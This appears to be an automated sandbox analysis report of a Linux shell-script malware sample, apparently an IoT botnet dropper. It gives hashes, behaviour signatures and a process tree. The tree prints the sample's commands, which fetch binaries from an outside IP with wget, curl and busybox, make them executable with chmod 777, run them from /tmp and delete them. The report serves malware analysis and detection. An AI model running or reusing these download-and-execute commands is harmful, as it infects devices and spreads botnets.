Analysis
-
max time kernel
71s -
max time network
73s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:35
Static task
static1
Behavioral task
behavioral1
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
-
Size
10KB
-
MD5
3a1ff8e10160c3ffbe68101993bf1067
-
SHA1
cbe663779e29b21349683a8c313cd1cb1c5eecaf
-
SHA256
a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63
-
SHA512
8513787e954b7a1209578497e6d91f13f54b1ab38ef937cb0f6d6cfd320fc1c4c4a7a8a4890ee1a8ad873d62e91cb2e5e82fa1f3673c62e6bb23d94110307586
-
SSDEEP
192:v7mG3aGTwUII9c4gCONyqRGZy5947TfmG3aGL4II9c845947T/CONyqy:vS4gCONyqRGZy5947Te45947T/CONyqy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 973 chmod 979 chmod 826 chmod 871 chmod 883 chmod 913 chmod 931 chmod 955 chmod 985 chmod 919 chmod 961 chmod 937 chmod 751 chmod 778 chmod 820 chmod 991 chmod 907 chmod 949 chmod 967 chmod 925 chmod 757 chmod 799 chmod 848 chmod 877 chmod 889 chmod 895 chmod 901 chmod 943 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 752 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 758 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 779 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 801 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 821 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 827 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 849 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 872 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 878 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 884 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 890 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 896 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 902 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 908 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 914 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 920 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 926 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 932 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 938 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 944 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 950 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 956 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 962 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 968 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 974 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 980 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 986 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 992 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 891 rm 952 wget 957 rm 832 curl 886 wget 888 busybox 849 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 933 rm 956 phFMgsQArmVdg945D14ipduIUYswPNrcK1 928 wget 932 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 954 busybox 887 curl 890 phFMgsQArmVdg945D14ipduIUYswPNrcK1 929 curl 930 busybox 953 curl 829 wget 843 busybox 852 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl
Processes
-
/tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh/tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:750
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:756
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:773
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:782
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:794
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:819
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:825
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:829
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:849
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:870
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:876
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:882
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:894
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:900
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:906
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:912
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:918
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:924
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:932
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:936
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:942
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- Writes file to tmp directory
